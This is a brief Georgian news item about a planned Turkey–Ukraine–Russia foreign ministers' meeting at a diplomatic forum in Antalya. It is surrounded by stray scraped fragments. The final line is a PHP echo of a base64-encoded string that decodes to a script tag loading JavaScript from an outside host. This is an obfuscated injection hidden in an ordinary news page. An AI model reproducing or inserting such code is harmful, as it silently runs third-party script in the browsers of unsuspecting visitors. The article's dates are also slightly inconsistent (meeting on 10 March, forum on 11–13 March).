celsiusi
ავერსი საქკაბელი
თურქეთის საგარეო საქმეთა მინისტრის განცხადებით 10 მარტს ანტალიაში, დიპლომატიურ ფორუმზე, უკრაინასა და რუსეთის წარმომადგენლებთან ერთად, სამმხრივი შეხვედრა შედგება, ამის შესახებ ინფორმაცია თურქული მედიით ვრცელდება.
 
მინისტრი იმედოვნებს, რომ შეხვედრა იქნება ცვლილებების და მნიშვნელოვანი ნაბიჯების გადადგმის საწყისი მშვიდობისა და სტაბილურობისკენ.
 
ფორუმი ქვეყნის სამხრეთით მდებარე კურორტ ანტალიაში 11-13 მარტს გაიმართება.
 
როგორც თურქული მედია წერს, შეხვედრაში უკრაინას საგარეო საქმეთა მინისტრი დმიტრო კულება წარმოადგენს, ხოლო რუსეთიდან მოლაპარაკებაში მონაწილეობას ასევე საგარეო უწყების ხელმძღვანელი, სერგეი ლავროვი მიიღებს.
716
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");